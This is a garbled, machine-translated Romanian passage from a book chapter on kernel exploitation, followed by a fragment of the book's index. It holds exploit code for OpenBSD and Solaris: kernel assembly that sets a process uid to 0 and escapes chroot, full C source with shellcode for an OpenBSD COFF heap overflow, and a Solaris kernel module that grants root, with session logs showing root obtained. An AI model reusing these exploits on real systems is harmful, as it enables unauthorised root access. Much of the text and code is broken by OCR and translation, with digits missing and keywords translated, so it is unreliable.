tampon personalizat regim x Chitanță descriptor proces Următorul operațiuni permite a primi informație din structurilor proces, necesar pentru manipulare Cu autentificare date și rădăcină Exista diferit moduri căutare structurilor proces LA prezent secțiune voi considerată Două din lor: Căutare în grămadă, nu recomandat pentru OpenBSD, și apel sistemică funcții sysctl() Căutare în grămadă LA miez OpenBSD indicator pe structura proces în dependențe din vulnerabil interfata poate ținut pe fix abordare pe relație la index grămadă Asa de modul în care după interceptare management noi Poate sa adăuga fix părtinire (diferență între indicator grămadă și Locație indicator pe structura proces) la index grămadă și a primi indicator pe structura proces DIN un alt mână, în linux nucleu mereu afișează structura proces în start grămadă miez, creată pe nivel proces Capitol Exploatare vulnerabilități nuclee Mulțumită acest particularități linux Căutare structurilor proces devine banal sarcină Apel sistemică funcții sysctl() Sistemică funcţie sysctl unelte simplu interfata transmitere informație Cu personalizat nivel pe nivel nuclee și înapoi Interfață sysctl este împărțit pe niste subcomponente pentru management miez, echipamente, virtual memorie reţea, fişier sistem și arhitectură Ne inainte de Total interesat subinterfață miez, realizabil funcţie kern sysctl() NOTĂ - Cm sys/kern/kern sysctl c linia Funcţie kern sysctl() la fel numește manipulatorii niste cereri, în volum inclusiv pentru structurilor proces, ceas frecvență, v-nod și informație despre fişier Structura proces prelucrate funcţie sysctl doproc(); acest funcţie prevede interfata la de interes ne informație regim miezuri int sysctl doproc(nume, namelen, Unde dimensiunep) int *Nume, u nt namelen char *Unde; mărimea t *dimensiune { [ ] pentru (, p != , p = LIST NEXT(p, p list)) { [ ] intrerupator (nume[ ]) { caz KERN PROC PID: [ ] dacă (p->pid != (pid t)nume[lj) continua; pauză: } Dacă (buflen >= dimensiunea(struct kiinfo proc)) { [patru] umple eproc(p &eproc); [cinci] eroare = copyout((caddr t)p &dp->kp proc dimensiunea(struct proc)) gol fill eproc(p, ep) regi ster struct proc *p, regi ster struct eproc *ep regi ster struct tty *tp, [ ] ep->e paddr = p Comanda intrerupator în funcții sysctl doproc() ([ ]) permite mâner variat tipuri cereri cerere KERN PROC PID destul de suficient pentru primind Vulnerabilitate ex Jbcs coff pregătire zmagic() necesar adrese structurilor rgos orice proces LA caz vulnerabilități setter() interfata sysctl() folosit mai multe moduri, care descris Mai departe Codul sysctl doproc() trece peste conectat listă structurilor [ ] pentru căutare în limba germana solicitat valorile PID Dacă sens găsite, funcţie umple structurilor ergos și kp proc ([patru] și [cinci]) și cauze a copia Funcţie fill eproc() (numit în punct [patru]) copii adresa structurilor proces Cu solicitat PID în camp e paddr structurilor ergos ([ ]) Mai departe adresa copiat în personalizat spaţiu în structura kiinfo proc (care este principal structura date funcții sysctl doproc()) Pe adiţional informație despre câmpuri aceste structurilor a lua legatura la fişier sys/sys/sysctL h Pentru primind structurilor kiinfo proc numit Următorul funcţie: gol obține proc(pid t pid struct kiinfo proc *kp) { ' u nt arr[ ], len; arr[ ] = CTL-KERN, arr[l] = KERN-PROC, arr[ ] = KERN PROC PID; arr[ ] = pid len = dimensiunea(struct kiinfo proc); dacă (sysctKarr patru kp &len, NUL ) p cred # eax = # p->p cred->p ruid = # Actualizați cr uid mov (^ebx)Jedx mov ^eax x (%edx) # edx = p->p cred->pc ucred # p- >p cred->pc ucred->cr uid = Încălcare restricții chroot Următorul asamblator fragment va servi pentru încălcări restricții chroot în inel Nu mergând adânc în Detalii, considera general principiu verificări chroot pe nivel individual proceselor Restricții chroot implementate umplere câmpuri fd rdir structurilor filedesc indicator v-nod limitare catalog (temniță director) La prelucrare cereri din proces nucleu controale, umplut dacă aceasta este camp indicator pe v-nod Dacă examinare dă pozitiv rezultat, mecanism prelucrare cereri se schimba Nucleu creează pentru proces nou rădăcină catalog, de fapt limitare a lui anticipat anumit director Pentru proces fără restricții chroot acest indicator egală zero Nu mergând adânc în Detalii implementare, sa spunem ce misiune acest index valorile NUL încalcă restricții rădăcină Legătură pe fd rdir prin structura proces arata Asa de: p->p fd->fd rdir Recurs la structura filedesc și a ei Schimbare banal implementate Două asamblator comenzi: # Schimbare p->p fd->fd rdir pentru încălcări restricții chroot mov x (%ex),%edx # edx = p->p fd mov ^eax Oxc(^edx) # p->p fd->fd rdir = Întoarcere din regim nuclee După schimbări niste câmpuri structurilor proces, a ridica nivel privilegii și Ieșire din restricții chroot necesar restabili normal modul muncă sisteme Pentru acest noi trebuie sa întoarcere în utilizator Vulnerabil! b exec ibcs coff prep zmaglc() cer modul, apoi mânca transfer către Control proces, cine a sunat sistemică funcţie Întoarcere în personalizat modul echipă iret simplu și simplu; la din pacate el nu mereu disponibil, deoarece ce în nuclee Mai a fi inchis niste obiecte sincronizare LA astfel de cazuri cont pentru transmite Control pe abordare cod miez, care îndepărtează blocare Cu obiecte sincronizare și subiecte cel mai previne fatal eșec miezuri Pe practică întoarcere în Codul miez, filmare blocare Cu obiecte sincronizare, de multe ori se dovedește cel mai bun cale reînnoire normal muncă sisteme Dacă scoate blocare nu neaparat, poate sa pur şi simplu profită metodă iret Întoarcere în personalizat modul Următorul fragment cod este tu manipulator sistemică functii, numit din proceduri prelucrare întrerupe (Întrerupe Serviciu Rutină, ISR) Funcţie cauze nivel inalt manipulator [ ], scris pe limba DIN, A după întoarcere management trenuri registre și efectueaza întoarcere în personalizat modul ([ ]) IDTVECCsyscal ) pushl dolari # Marimea comenzi repornire syscal pushl $T ASTFLT # Număr capcane AST INTRARE movl C LABEL(cpl),%ebx movl TF EAX(%esp) esi # Număr sistemică funcții [ ] caii C LABEL(syscal ) : /* Examinare capcane AST la ieșire în personalizat modul */ cі ei $ C LABEL(a pas) je Dacă movb $ C LABEL(în așteptare) sti caii C LABEL(capcană) jmp b : cmpl C LABEL(cpl) Debx jne f [ ] INTRFASTEXIT #defini INTRFASTEXIT \ popi %es popi %ds popi £edi popi %esi popi £ebp popi %bx popi ^edx popi £ecx popi £eax addl $ ^sp Iret \ \ \ \ \ \ \ \ \ \ Capitol Exploatare vulnerabilități nuclee Următorul implementare fondat pe descris anterior mecanism prelucrare apeluri sistemică funcții Cu emulare întoarcere din prelucrare întrerupe: cii # Pregătirea selectoare pentru personalizat regim # es = ds = Oxlf pushl $ xlf popi $es pushl $ xlf popi £ds # edi = esi = x pushl x USD popi %edi pushl x USD popi ^esi # ebp = OxdfbfdOOO pushl xdfbfd USD popi £ebp # ebx = edx= ecx = eax = x pushl$ x popi W)x pushl$ x popi ^edx pushl$ x popi %ecx pushl$ x popi ^eax pushl $ xlf # ss = Oxlf pushl $ xdfbfd # esp = OxdfbfdOOO pushl$ x # steaguri pushl $ x # cs selector cod segment personalizat regim pushl x USD # gol poziţie pentru gipdZ Zheir ret Întoarcere în Codul nuclee Metodologie întoarcere în personalizat modul fondat pe utilizare special Inregistreaza-te DTR (Întrerupe Descriptor masa Inregistreaza-te), conținând elementar adresa Mese descriptori întrerupe (Întrerupe Descriptor masa, idt) Nu a intra în în de prisos Detalii, masa IDT conţine manipulatorii întrerupe pentru variat vectori întrerupe Fiecare întrerupe procesor x prezentat număr din inainte de ; aceste numere numit vectori întrerupe Vectori întrerupe sunt utilizate pentru căutare elementar manipulator orice întrerupe în IDT Masa IDT include din elemente, marimea toata lumea din care este octet Exista Trei soiuri descriptori dar ne va fi interes numai unu din lor — descriptor sistemică poarta de acces (sistem Poartă descriptor) Descriptor poarta de acces capcane (capcană Poartă Descriere) servește pentru destinaţie elementar manipulator sistemică functii, despre care spus în anterior secțiune Vulnerabilitate exec ibcs coff pregătire zmaglc() NOTĂ - LA OpenBSD pentru descriptori poarta de acces capcane și sistemică descriptori folosit unu și acea la fel structura descriptor poarta Cu exceptia A merge, în programatic cod sistemică descriptori de multe ori numit descriptori capcane sys/arch/i /machdep c linia setgate(&idt[ ], &IDTVEC(apel de sistem) SDT SYS TGT, SEL UPL, GCODE SEL), sys/arch/i /include/segment h linia struct descriptor poarta { nesemnat gd looffset şaisprezece; nesemnat gd selector şaisprezece: nesemnat gd stkcpy cinci: nesemnat gd xx nesemnat gd type: nesemnat gd dpl ; nesemnat gd p : nesemnat gd hioffset şaisprezece, } câmpuri structurilor descriptor poarta gd Looffset și gd hioffset formă adresa nivel scăzut manipulator întrerupe Pe adiţional informație despre individual câmpuri a lua legatura la instrucțiuni pe arhitectură pe abordare http:// developer inteLcom/design/Pentium /manuals Masa IDT în OpenBSD numit idt region, A poziţie x corespunde descriptor întrerupe sistemică funcții Deoarece lungime fiecare înregistrări IDT este octet, structura descriptor poarta pentru sistemică funcții este pe abordare idt region + x X x , apoi mânca idt region + x bash- b# Oprit la Depanator+ x părăsi ddb> x/x idt region+ x idt regi pe+ x e c ddb> i dt region+ x eOlOefOO La a primi original manipulator sistemică functii, necesar a executa operațiuni forfecare și SAU Cu pic câmpuri descriptor sistemică poarta de acces Asa de noi noi venim la abordare nuclee x e s bash- b# Oprit la Depanator+ x părăsi ddb> x/x xe e c Xosyscall end pushl $ x ddb> „M Xosyscall end+ x pushl $ x Xosyscall end+ x caii syscall La fel de și în caz excepții sau program întrerupe corespunzător vector este în IDT Control transmise manipulator, găsite în unu din descriptori gateway-uri Acest manipulator, numit intermediar Capitol Exploatare vulnerabilități nuclee manipulator, în final cont va conduce ne la prezent manipulator La fel de este văzut din weekend date depanator miez, original manipulator XosyscalL Sfârşit salvează Toata lumea registre (A la fel execută alte nivel scăzut operațiuni) și imediat cauze real manipulator syscall() Anterior deja menționat despre volum, ce adresa idt region mereu stocate în special Inregistreaza-te idtr La fel de aplica la a lui conţinut? sidt x (%edi) mov x (%ed ) Debx Adresa idt region plasat în Inregistreaza-te ebx, care acum poate folosit pentru contestatii la IDT Următorul asamblator fragment defineste manipulator sistemică functii: sidt x (%edi) mov mov mov shr sal sal shr sau x (%edi)Debx # mov idt region în ebx x (%bx),%edx # idt region[ x * ( *dimensiunea lung) = x ] x (%ebx),%ecx # idt region[ x ] $ x deskh # $ x deskh # ecx = gd hloffset $ x , %edx # x USD edx # edx = gdjooffset ^ecxjedx # edx = ecx | edx = Xosyscall end Pe acest etape noi cu succes a dat seama Locație original și intermediar manipulatorii Următorul logic Etapa — Căutare call syscall în cod miez, calcul părtinire pe echipe apel și a lui plus la abordare comenzi Cu exceptia A merge, necesar adăuga Mai mult cinci octet pentru compensare mărimea cel mai comenzi caii xor YeshDesh # Reducerea la zero tejghea sus inc £ecx movb ($edx Lesh) DY # bl = Xosyscall end++ empb $ xe DY # Dacă bl == xe 'calG jne sus lea (%edx Desh) Dehx# Xosyscall end+^ecx caii syscall LA Inregistreaza-te %ex stocate adresa prezent manipulator syscall() Acum trebuie sa defini, Unde exact ar trebui să transmite Control interior funcții syscall(); aceasta este va necesita Mai mult detaliat cercetare în variat versiuni OpenBSD Cu diferit parametrii compilare miezuri La din fericire se dovedește, ce noi Poate sa pur şi simplu petrece Căutare comenzi caii *%ex în syscall() Exact acest comanda transmise Control final manipulator sistemică funcții în toate testat versiuni OpenBSD bash- b# Oprit la Depanator+ x părăsi ddb> x/ syscal + x syscal + x caii *£eax ddb>cont Al nostru poartă — calculati părtinire ( x în dat caz) pentru orice versiuni OS Noi vrei întoarcere Control din implementate cod echipă, situat pe loc la fel pe provocare caii *%ex, și continua performanţă în modul miezuri Codul căutare arata Asa de: Vulnerabilitate execJbcs coff prep zmagic() mov muie, mov cld mov %ecx Jedi $ xff da $ xffffffff Desh repnz scas £es: (^edl) da # Noțiuni de bază la căutare Oxff mov (%ed ) DY emp $ xd , W # Verifica, ar trebui să dacă OxdO pe Oxff jne muie # Dacă Nu, a incepe din nou Inc %ed # Găsite! xor %eax Deah # A pregati întors sens Apăsaţi %edi # aduceți adresa în grămadă ret # Merge pe găsite abordare Primit Codul — Toata lumea, ce necesar pentru corect întoarcere El poate folosit Cu orice Opțiuni revărsare pe baza sistemică funcții fără adiţional modificări Chitanță privilegii root (uid= ) Rămășițe numai uni Toata lumea dat secțiuni Noi primim final versiune cod, care ridică privilegiu și îndepărtează Toata lumea restricții chroot: -bash- b$ uname -A OpenBSD theO wideopenbsd net GENERIC# bash- b# gcc -o theOtherat coff ex c -bash- b$ d uid= (negru) gid= (negru) grupuri= (nr r) -bash- b$ /theOtherat DO NU A UITA LA SHRED / bcs own intrerupere de sarcina capcană -bash- b$ id u d= (rădăcină) gid= (negru) grupuri= (nr r) -bash- b$ bash -bash- b# cp /dev/zero / bcs own /corn- wrlte a eșuat, fişier sistem este deplin cp: / bcs own Nu spaţiu stânga pe dispozitiv bash- b# rm -f / bcs own bash- b# cap - /etc/master passwd rădăcină USD a USD [a tăia] - demonul - Charlie & /rădăcină /bln/csh demonul * l -The devii se /rădăcină /sbln/nologln coff ex c - - /** OpenBSD X - **/ /** Revărsare grămadă nuclee Cu folosind **/ /** exec ibcs coff prep zmag c() **/ /** Notă binar compatibilitate bcs Cu SCO și ESTE C **/ /** activat în standard instalare **/ /** Drepturi de autor feb Slnan "noig" Eren **/ Capitol Exploatare vulnerabilități nuclee /** noIrOolympos org | no r@uberhaxOr net **/ # include # include #include # include # include # include # include /* kernel sc s */ nesemnat char shelIcodeCJ = „\xe \x f\x \x \x \x \x \x \xl \xfe\xca\xad\xde\xad\xde\xef\xbe” „\x \x \x \x f\x b\x f\x b\x \xl \x \xc \x \x \x \x b\xl \x ” „\x \x \x b\x \xl \x \x \x c\x d\x c\x \x \x f\x \x f\x \x b” „\x f\xO \x b\x \xOO\xO \xOO\xOO\x b\x b\xO \xO \xOO\xOO\xcl\xe \xlO” „\xcl\xel\xlO\xcl\xe \xlO\xcl\xea\xlO\xO \xca\x \xc \x \x a\xlc\xOa” „\x \xfb\xe \x \xf \x d\xlc\x a\x \x b\x c\x a\x \xcl\x \x \xd ” „\x \xcf\xb \xff\xfc\xb \xff\xff\xff\xff\xf \xae\x a\xlf\x \xfb\xd ” „\x \xef\x \x \xc \x \xc ” /* ret sc s */ nesemnat char cod ret shell[] = ”\xe \xOf\xOO\xOO\xOO\x \x \x \xl \xfe\xca\xad\xde\xad\xde\xef\xbe" „\x \x \x \x f\x b\x f\x b\x \xl \x \xc \x \x \x \x b\xl \x ” „\x \x \x b\x \xl \x \x \x c\xfa\x a\xlf\x \x a\xlf\xlf\x a\x ” „\x f\x a\x \x e\x \x \xd \xbf\xdf\x d\x a\x \x b\x a\x \x a\x a” „\xOO\x \x a\xOO\x \x a\xlf\x \xOO\xdO\xbf\xdf\x \x \xO \xOO\xOO” „\x a\xl ”, nesemnat char pusheip[] = „\x \x \x \x \x ”; /* fiii elp */ nesemnat char iret[] = „\xcf”; nesemnat char ex tsh[] = „\x \xc \xcd\x \xcc”; /* xorl ^eahDeah int x USD int */ #def ne ZERO(p) memset(&p, x slzeof(p)) /* * COFF fişier antet */ struct coff filehdr { u short fjnagic /* magic număr */ u short f nscns /* Cantitate secțiuni */ lung f timdat /* Temporar eticheta */ lung f symptr /* Părtinire Mese personaje */ lung f nsyms /* Număr înregistrări în masa personaje */ u short f opthdr, /* Marimea opțional antet */ u short f steaguri: /* Steaguri */ Vulnerabilitate execjbcs coff prep zmagic() /* fjnagic */ #defini C FF MAGIC I x c /* f steaguri */ #defini COFF F RELFG #defini COFF F EXEC #defini COFF F LNNO #defini COFF F LSYMS #defini #defini #defini COFF F SWABD COFF F AR WR COFF F AR WR x x x x x x x /* * Sistemică antet COFF */ struct coff outdr { mic de statura ajnaglc: scurt a vst lung a tsize, lung a dsize; lung a bsize, lung o intrare, lung a tstart, lung a dstart, /* magic număr */ #defini COFF ZMAGIC /* * antet secțiuni COFF */ struct coff scnhdr { } char s name[ ]; lung s paddr, lung s vaddr, lung mărime s, lung s scnptr lung s relptr, lung sjnnoptr: u short s nreloc: u short s nlnno lung s steaguri, /* s steaguri */ #defini COFF STYP TEXT x #defini COFF STYP DATA x #defini COFF STYP SHLIB x gol get proc(pid t struct kiinfo proc *), gol sig handler(), int Capitol Exploatare vulnerabilități nuclee principal (int argc char **argv) u int i fd, depanare = O u char *ptr, *shptr, u long *lptr; u long pprocadr decalaj; struct kiinfo proc kp; char *args[] = { " / bcs own", NUL}; char *envs[] = { „RIP=theo” NUL}; // structurilor COFF struct coff filehdr fhdr, struct coff outdr Ahdr struct coff scnhdr scnO, seni, scn ; dacă(argv[l]) { f(!strncmp(argv[l], "-v", )) depanare = , altfel { pr ntf ("-v verboroasă steag numai\n"), ieșire (O); ZERO(fhdr), fhdr fjnagic = C FF MAGIC I ; fhdr f nscns = //TEXT DATE SHLIB fhdr f timdat = oxdeadbeef, fhdr f symptr = x ; fhdr fjisyms = fhdr f opthdr = dimensiunea(ahdr); // Marimea antet OUT fhdr f steaguri = COFF F EXEC; ZERO(ahdr) ahdr ajnagic = COFF ZMAGIC; ahdr,a tsize = ahdr a dsize = ; ahdr a bsize = ahdr o intrare = x ; ahdr a tstart = ahdr a dstart = ZERO (scnO) memcpy(&scn sjiame, " text", cinci); scnO s paddr = x , scnO s vaddr = x , scnO s size = , scnO s scnptr = dimensiunea (fhdr) + dimensiunea(ahdr) + (dimensiunea(sc // Părtinire segment text scnO s relptr = , scn s lnnoptr = scnO s nreloc = scnO sjilnno = ; scnO s steaguri = COFF STYP TEXT: ZERO(scnl), memcpy(&scnl s Nume, " date", cinci), Vulnerabilitate execjbcs coff prep zmagic() seni s paddr = x - , scnl s vaddr = x - , seni s s ze = , scnl s scnptr = dimensiunea (fhdr) + dimensiunea(ahdr) + (s zeof(scn )* ) + , // Părtinire segment date seni s relptr = , seni s lnnoptr = ; scnl s nreloc = : scnl s nlnno = , scnl s flags = COFF STYP DATA, ZERO(scn ): memcpy(&scn s name, „ shlib”, ); scn s paddr = , scn s vaddr = ; scn s s ze = Oxbo; //AICI ESTE DA OVF'!! static buffer = scn s scnptr = dimensiunea (fhdr) + slzeof(ahdr) + (s zeof(scn )* ) + * ; // Părtinire segment date scn s relptr = , scn s lnnoptr = ; scn s nreloc = : scn s nlnno = , scn s flags = COFF STYP SHLIB, decalaj = dimensiunea (fhdr) + slzeof(ahdr) + (dimensiunea(scn )* ) + * , ptr = (car *) malloc(offset), If('ptr) { perrorCmal loc"), exlt(-l) } memset(ptr, oxcc, decalaj) /* umplere int */ /* copierea secțiuni */ decalaj = memcpy(ptr, (car *) Sfdr, slzeof(fhdr)), decalaj += sizeof(fhdr) memcpy(ptr+offset, (car *) &ahdr, dimensiunea(ahdr)), decalaj += slzeof(ahdr) memcpy(ptr+offset, (car *) SscnO dimensiunea (scnO)), decalaj += dimensiunea (scnO), memcpy(ptr+offset &scnl, sizeof(scnl)), decalaj += sizeof(scnl), memcpy(ptr+offset, (caracter*) &scn , dimensiunea(scn )), decalaj += dimensiunea (scn ) iptr = (u long *) ((car *)ptr + slzeof(fhdr) + slzeof(ahdr) + (dimensiunea(scnO) * ) + + -r Oxbo - ) shptr - (car *) malloc( ) f('shptr) { perrorU'malloc") Capitol Exploatare vulnerabilități nuclee ieșire (-l) } dacă (depanare) printf("sarcina utila adr: Bou£ x\t" shptr); memset(shptr, oxcc, ); get proc((pid t) getppidO, &kp); pprocadr = (u lung) kp kp eproc e paddr; dacă (depanare) printf("părinte proc adr: Bou% x\n", pprocadr); *lptr++ = Oxdeadbeef; *lptr = (u lung) shptr; shellcode[ ] = pprocadr & oxff, shellcode[ ] = (procadr » ) & Oxff: shellcode[ ] = (procadr » şaisprezece) & oxff, shellcodeE ] = (procadr » ) & oxff, memcpy(shptr shellcode, sizeof(shellcode)-l), deconectațiC /ibcs own"): f((fd = deschis(" / bcs own" O CREATAO RDWR, perrorCopen"), ieșire (-l); scrie (fd, ptr dimensiunea (fhdr) + dimensiunea(ahdr) + (dimensiunea(scnO) * ) + * ): close(fd); gratuit(ptr); semnal (SIGSEGV, (nud (*)())sig handler), semnal (SIGILL, (nud (*)())sig handler); semnal (SIGSYS (nud (*)())sig handler), semnal (SIGBUS, (nud (*)())sig handler), semnal (SIGABRT, (nud (*)())sig handler): semnal (SIGTRAP, (nud (*)())sig handler) printf("\nD NU A UITA APOI SHRED /ibcs own\n"), execve(args[ ] argumente, envs); perrorCexecve"), } gol sig handler() { ieșire (O) } gol get proc(pid t pid, struct kiinfo proc *kp) { u int arr[ ] len Vulnerabilitate descărcări module nuclee vfs getvfssw() arr[O] = CTL KERN: arr[l] = KERN-PROC, arr[ ] = KERN PROC PID, arr[ ] = pid; len = dimensiunea(struct kiinfo proc); f(sysctl(arr, patru, kp, &len, NUL, ) #include #include #include /*int sysfs(int opcode, const char *fsname), */ int mendnt argc, char **argv) { char nume mod[] = " / / /tmp/oo” char buf[ ], char ver[ ], *ptr, Capitol Exploatare vulnerabilități nuclee int șaizeci și patru = O, memset((car *) buf x , ) if(sysinfo(SI ISALIST, (car *) buf ) p next) { [ ] if(strstr(p->p user u comm (car *) "ooooo")) [patru] pp = p->p părinte [cinci] noucr = crget(); [ ] mutex enter(&pp->p crlock) cr = pp->p cred; crcopy to(cr noucr) pp->p cred = noucr [ ] newcr->cr u d = [ ] mutex exit(&pp->p crlock); } continua [nouă] mutex exit(&pidlock) Bust legate de listă structurilor proceselor începe în punct [ ] Direct față start enumerare pentru listă instalat blocare, la a lui conţinut nu schimbat în progres căutare ţintă proces ( /oooo în al nostru exemplu) Indicator practic se referă pe start legate de listă, asa de noi ÎNCEPE Cu pego ([ ]) și in miscare la Următorul element pe index p next LA punct [ ] Nume proces comparat Cu Nume executabil modul (în ultimul trebuie sa fi prezent subșir oooo) Nume executabil modul stocate în matrice u comm structuri, pe care indica camp p utilizator structurilor proces Funcţie strstr() caut primul intrare linii oooh în u comm Dacă dorit semnătură prezent în Nume proces, noi extrage descriptor părintească proces ([patru]), care este comanda CPU Mai departe program creează nou structura privilegii pentru comanda procesor ([cinci]), stabileste blocare mutexuri pe timp împlinire operațiuni ([ ]), actualizări vechi structura și resetează identificator utilizator (UID) în punct [ ] LA completare a lui muncă Codul a ridica nivel privilegii îndepărtează blocare mutexuri Cum structurilor privilegii Asa de și legate de listă structurilor proceselor ([ ] și [nouă]) actual Cu - #ts ude #include #include #include #include Capitol Exploatare vulnerabilități nuclee #ipslude #include #include #include #include #include #include extern struct mod ops modjniscops; int g mm (gol); int dZttZO { regi ster proc t *p: regi ster proc t *pp, cred t *cr, *newcr, mutex enter(&pidlock), pentru (pag = activ, p != NUL; p = p->p next) { if(strstr(p->p user u comm, (car *) "ooooo")) { PP = p->p părinte; noucr = crgetO mutex enter(&pp->p cr ock); cr = pp->p cred; crcopy to(cr, newcr); pp->p cred = newcr; newcr->cr uid = ; mutex ieșire(&pp->p ceas); } continua; mutex exit(&pidlock), întoarcere , } static struct modlmisc modlmisc = { &mod mi scops, "u comm" static struct modlinkage modlinkage = { MODREV (nud *) &modlmisc, NUL int init(void) Vulnerabilitate descărcări module nuclee vfs „getvfssw() { int eu, Dacă (( = mod instal (&modl nkage)) != ) //cmn err(CE NOTE, # fdef - DEBUG el se cmn err(CE NOTE, „OoOoOoOo instalat oOoOoOoOoOoO"); #endif = g mm (), întoarcere i int info(struct modinfo *modinfop) întoarcere (mod info(&modlinkage, modinfop)), int fini(void) { int eu, dacă ((i = mod remove(&modlinkage)) != ) //cmn err(CE NOTE, "nu îndepărtat"): #i fdef DEBUG altfel cmn err(CE NOTE "îndepărtat"): #endif întoarcere eu; } Noi cita Două diferit scenariu comanda interpret, compilarea modul nuclee pentru - și pe de biți versiuni nuclee respectiv Module nuclee trebuie sa compila Cu anumit parametrii aceasta și este de bază scop dat scenarii, deoarece ce alege corect trusa parametrii fără experienţă dezvoltare cod nuclee va fi nu asa de usor -face SH - /opt/SUNWspro/bin/cc -hSS -g -xregs=nu^appl noUloat -xarch=v \ -DUSE- KERNEL-UTILS -D KERNEL -D B actual c ID -despre actual -G actual o rm curent o mv actual o gcc -o oooo sysfs ex c /usr/ccs/bin/strip oooo o -face SH - /opt/SUNWspro/bin/ss -xCC -g -xregs=no%appl no^float -xarch=v \ - DUSE KERNEL UTILS -D KERNEL -D B moka c ID -despre actual -G actual o rm actual o mv actual o G lavă Exploatare vulnerabilități nuclee gcc -despre oooh sysfs ex Cu /usr/ccs/bin/stripe oooh o Chitanță privilegii root (uid= ) LA ultimul secțiune afișate Cum a primi privilegii root (uid= ) pe compilator Cu sistem solaris lansa programe din comanda linii efectuate Următorul cale: $ uname -A Sun OS slent cinci Generic - soare u sparc SUNW Ultra- $ isainfo -b $ id uid= (ser) gid= (personal) $ gudron xf oooo gudron $ Оs - total drwxr-xr-x personalul ser Mar nouăsprezece oooo -rw-r r ser personal aug unsprezece oooo gudron $ CD oooo $ Оs face sh moka c O - o - O - sysfs ex c nouă face SH o - o - o - oooo $ id uid= (ser) gid= (personal) $ /oOoO $ id uid= (ser) gid= (personal) euid= (rădăcină) $ atingere toor $ Оs - toor -rw-r r rădăcină personal aug unsprezece optsprezece toor Codul lucru în Solaris , și nouă, și Cum în -, Asa de și în pe de biți versiuni La ne nu a fost vechi versiuni Solaris (astfel de Cum și ), asa de ei nu sprijinit Tem nu Mai puțin, noi noi credem ce Codul va fi compila și în mod fiabil muncă în Solaris și Rezultate LA acest capitol demonstrat Opțiuni exploatare vulnerabilități miez, descris în capitol Dezvoltare fonduri implementare cod atacuri pentru variat vulnerabilități nuclee de multe ori se dovedește foarte dificil sarcină, Cum aceasta este a fost Cu vulnerabilitate OpenBSD Vă rugăm să rețineți ce singur defecte nuclee exploata relativ uşor, A Cu alții cont pentru considerabil muncește din greu Vreau să crede, ce depus ne metode exploatare vulnerabilități nuclee Ajutor pentru tine a face în curs de dezvoltare proprii exploatații, A poate a fi, și promovare Securitate cod nuclee La fel de ne pare, eu insumi analiză cod nuclee aduce masa plăcere, A software implementare exploatează pentru exploatare găsite defecte Mai mult mai interesant Mulți proiecte Cu deschis coduri nuclee numai și asteapta al tău intervenţie norocos vânătoare! Alfabetic indicator ȘI Accept(), funcţie, ASCII codificare, , ESP, Inregistreaza-te, , eteric, program, CU EXCEPȚIA LA ÎNREGISTRARE, structura în baza , sistem criptare, brk(), funcţie, bss, segment, exec(), funcţie, Ieșire(), funcţie, , exitProcess(), funcţie, ExitThread(), funcţie, Cu apel, comanda, PÂNZĂ, punga de plastic, cbrowser, program, rădăcină, comanda, Cod roșu, vierme, COM, model, suc, date, CrcateFileO, funcţie, createProcess(), funcţie, domeniul de aplicare, program, etichete, program, cygwin, punga de plastic, F Faultmon, program, F FO, model, furculiţă(), funcţie, liber(), funcţie, , fstat, utilitate, ftp, demon, G gcc, compilator, , gdb, depanator, , GetProcAddicssO, funcţie, GetProcesslleapO, funcţie, gctSystemDirectoryW(), funcţie, glibc, bibliotecă, D date, segment, DCE-RPC, punga de plastic, dcom, model, depanare, depanator, ocoliri, punga de plastic, Atacul DOS DTORS, masa, , gunoi, utilitate, dup (), funcţie, dw, directivă, GlobalAI oc(), funcţie, a primit, masa, n HeapAllocate(), funcţie, HeapCreateQ, funcţie, L , arhitectură, ІAT, Mese, IDA Ryu, dezasamblator, IDS, sistem, E EAH, Inregistreaza-te, EBH, Inregistreaza-te, ECX, Inregistreaza-te, steaguri, perucir, EIR, Inregistreaza-te, elf, format, S U A, server web, , L L FO, model, LoadLibrary(), funcţie, LocalAlloc(), funcţie, itrace, la farfurie, Alfabetic indicator m inalloc(), funcţie, , ipeipsruo, funcţie, ishparo, funcţie, MultiByteToWidcChai(), funcţie, , N nasm, asamblator, pisica plasa, utilitate, NOP agregat, comanda, NTDLL DLL, modul, despre objdump, utilitate, OilyDbg, depanator, , oracol, DBMS, R hohote, bloc, , PE-COFF, format, perl, limba, ROR, comanda, papa, comanda, printf(), funcţie, Apăsaţi, comanda, PUSHAD, comanda, Piton, limba, codul p, R geoI oc(), funcţie, ges(), funcţie, recvfrom(), funcţie, RevertToSelfO, funcţie, rădăcină, privilegiu, RtlEnterCriticalSection(), funcţie, RtlInageNtHeader(), funcţie, RtlLeaveCriticalSection(), funcţie, RVA, adresarea, o sută S da, manipulator excepții Serviciu Rusk, punga de plastic actualizări, softlce, depanator, SP KE, program, SP KE, utilitate, SQL Server, platformă, SQL-UDP, defect, strace, ooty tiga, strcpyQ, funcţie, , strlenQ, funcţie, sistem(), funcţie, , t tcpdump, utilitate, TEV, bloc, text, segment, TlsGetValue(), funcţie, TlsSetValue(), funcţie, Transact SQL, limba, și unicode, codificare, , , , V VirtualProtectQ, funcţie, W WideCharToMultiByte(), funcţie, windbg, depanator, Windows Server, platformă, windows h, antet fişier, wprintfQ, functii, WSASocketQ, funcţie, wu-ftpd, demon, X xor, comanda, ȘI de urgență completare, de urgență completare Servicii, automat completare, autorizare, aditiv criptare, adresa virtual, o sută întoarcere, , relativ, o sută abordare spaţiu, algoritm Nagla, alfanumerice filtru, analiză ascendent, temporar semne, grafic, binar, , dinamic, selectiv, instrumental, original cod, mașinărie cod, Descendentă, static, arhitectural defect, asamblator, atac substituiri adrese întoarcere, pe DBMS, Alfabetic indicator atac (continuare) pe nivel SQL, verso conexiuni, devastare, suprascrierea zero lungime, revărsare grămezi, aplicat nivel, reţea nivel, format linii, autentificare, , B nesemnat comparaţie, Securitate, bibliotecă incorporat cod, dinamic, dinamic aspect, , bloc mediu inconjurator proces, bloc mediu inconjurator curgere, , proces, , decalaj în protecţie, tampon, în vector întrerupe veneţian metodă, , Viena, diagrame, virtual funcţie, , implementate Codul, , introducere greșeli, , extern procedură, întoarcere în libc, magic număr, recuperare grămezi, ascendent analiză, incorporat asamblator, invazie, , apel înapoi, , mediat, detectare vulnerabilitati, G global masa decalaje global funcţie, la nivel global unic număr, cuib, grafic analiză, d binar analiză, demon, , copac, echilibrat, descriptor întrerupe descriptor (continuare) proces, sistemică poarta de acces, poarta de acces capcane, distrugător, , defect Daemonul SNMP DOS în Windows SQL-UDP, arhitectural, revărsare, , verificări granițe, format linia, , , format linii, întreg revărsare, defect Securitate, decriptare, , diagramă Viena, dinamic bibliotecă, dinamic morman, dinamic 